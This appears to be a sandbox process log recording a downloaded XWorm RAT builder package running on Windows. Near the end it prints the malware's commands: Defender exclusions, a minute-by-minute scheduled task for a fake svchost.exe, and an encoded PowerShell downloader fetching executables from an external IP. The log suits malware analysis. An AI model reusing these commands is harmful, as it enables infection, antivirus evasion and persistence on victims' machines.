"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4080 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4200 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4244 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4588 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4600 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=4616 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Guna.UI2.dll"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5312488AE7951256FD535A170B923D --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=15B5A64AE6FE350026D67382BD5E688A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=15B5A64AE6FE350026D67382BD5E688A --renderer-client-id=2 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D38B3C5BF85A9F763E2E1F34D1422946 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\ResHacker.exe"

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\vncviewer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9986b3cb8,0x7ff9986b3cc8,0x7ff9986b3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1

C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe

"C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe"

C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe

"C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004B8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6792 /prefetch:2

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7076 /prefetch:8

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe

"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA